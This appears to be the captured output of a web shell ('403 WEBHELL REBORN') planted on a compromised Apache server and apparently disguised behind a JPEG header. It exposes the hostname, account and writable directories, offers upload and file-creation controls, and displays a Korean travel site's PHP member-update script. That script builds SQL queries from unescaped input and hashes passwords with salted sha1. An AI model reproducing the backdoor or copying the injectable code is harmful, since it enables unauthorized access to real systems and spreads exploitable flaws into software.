ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/process/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/process/modify_member_info.php
<?php
	include $_SERVER['DOCUMENT_ROOT'].'/include/base.php';
	include $_SERVER['DOCUMENT_ROOT'].'/process/process_common.php';

	$tb_name = "TB_MEMBER";

	$member_id = $_SESSION['web_member']['mb_id'];

	if(!$member_id){
        $errMsg = _e("로그인해주세요.");
		echo "<script>alert('{$errMsg}');location.href='/page/login.html';</script>";
		exit;
	}

	$mb_sms = 'N';

	if($_POST['mb_sms'] == 'on'){
		$mb_sms = 'Y';
	}

	if(strpos($_SERVER['HTTP_REFERER'], "/page/info-change.html") !== false){
		if($member_id) {

			//기존패스워드가 일치하는지 확인
			$member_password = trim($_POST['member_password']);
            $member_password = sha1($pw_salt_value.$member_password);
			$sql = "SELECT count(*) AS cnt FROM {$tb_name} WHERE mb_id = '{$member_id}' AND mb_pwd = '{$member_password}'";
			$res = $db_connect->query($sql);

			$check_data = $res->fetch_array(MYSQLI_ASSOC);

			if($check_data['cnt'] == '1'){

				$member_email = trim($_POST['member_email']);
				if ($member_email != '') {
					$checkMail = filter_Var($member_email, FILTER_VALIDATE_EMAIL);
					if ($checkMail) {
						$sql = "UPDATE {$tb_name} SET mb_email = '{$member_email}' WHERE mb_id = '{$member_id}'";
						$db_connect->query($sql);
					}
				}


				$member_new_password = trim($_POST['member_new_password']);
				$member_new_password_confirm = trim($_POST['member_new_password_confirm']);

				if($member_new_password != '' && $member_new_password_confirm != ''){

					if ($member_new_password == $member_new_password_confirm) {

                        $member_new_password = sha1($pw_salt_value.$member_new_password);

						$sql = "UPDATE {$tb_name} SET mb_pwd = '{$member_new_password}' WHERE mb_id = '{$member_id}'";
						$db_connect->query($sql);

					}

				}



				$member_name = trim($_POST['member_name']);
				if ($member_name != '') {

					$member_name = $db_connect->escape_string($member_name);

					$sql = "UPDATE {$tb_name} SET mb_nm = '{$member_name}' WHERE mb_id = '{$member_id}'";
					$db_connect->query($sql);

				}

				$member_tel_number = trim($_POST['member_tel_number']);
				$member_tel_number = $db_connect->escape_string($_POST['member_tel_number']);
				if ($member_tel_number != '') {
					$member_tel_number = str_replace("-", "", $member_tel_number);
					$sql = "UPDATE {$tb_name} SET mb_phone = '{$member_tel_number}' WHERE mb_id = '{$member_id}'";
					$db_connect->query($sql);
				}

				$member_sms = $_POST['member_sms'];
				$is_member_sms = "N";
				if ($member_sms == 'on') {
					$is_member_sms = "Y";
				}
				$sql = "UPDATE {$tb_name} SET mb_sms_yn = '{$is_member_sms}' WHERE mb_id = '{$member_id}'";
				$db_connect->query($sql);

                $errMsg = _e("회원정보 변경이 완료되었습니다.");
				echo "<script>alert('{$errMsg}');location.href='/'</script>";
				exit;


			}else{
                $errMsg = _e("기존 비밀번호가 일치하지 않습니다.");
				echo "<script>alert('{$errMsg}');location.href='/page/info-change.html';</script>";
			}
		}else{
			echo "<script>location.href='/'</script>";
			exit;
		}



	}else{
		//잘못된 접근
		echo 'failed access';
		exit;
	}
?>

Anon7 - 2021